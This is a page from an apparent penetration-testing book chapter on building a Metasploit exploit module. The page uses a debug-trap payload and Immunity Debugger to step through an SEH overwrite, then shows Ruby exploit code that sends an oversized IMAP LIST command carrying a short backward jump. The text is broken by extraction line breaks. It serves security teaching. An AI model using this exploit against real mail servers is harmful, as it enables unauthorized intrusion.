208
Chapter 14
The payload that we use at ,
generic/debug_trap
, won’t actually send a
payload. Instead, it sends multiple
\xCC
s, or breakpoints, to debug the execu-
tion flow of the exploit. This is useful for confirming that your shellcode is
inserted at the right places in your exploit.
After running the exploit, open the Immunity Debugger, as shown in
Figure 14-5, and at the crash select
View
SEH chain
. Set a breakpoint by
pressing F2, and then press
SHIFT
-F9 to pass the exception to the application
and step into the
POP-POP-RETN
sequence of instructions.
Now, still in the debugger, press F7 to single-step through the instructions
until you land in the
41414141
contained in NSEH.
Figure 14-5: Landing in the
POP-POP-RETN
instructions
Next, edit the exploit to include the instructions for the short jump back-
ward, as shown here:
def exploit
connected = connect_login
lead = "\x41" *
10356
nseh =
"\xeb\xf9\x90\x90"
evil = lead + nseh + [target.ret].pack("A3")
print_status("Sending payload")
sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
sock.put(sploit)
handler
disconnect
end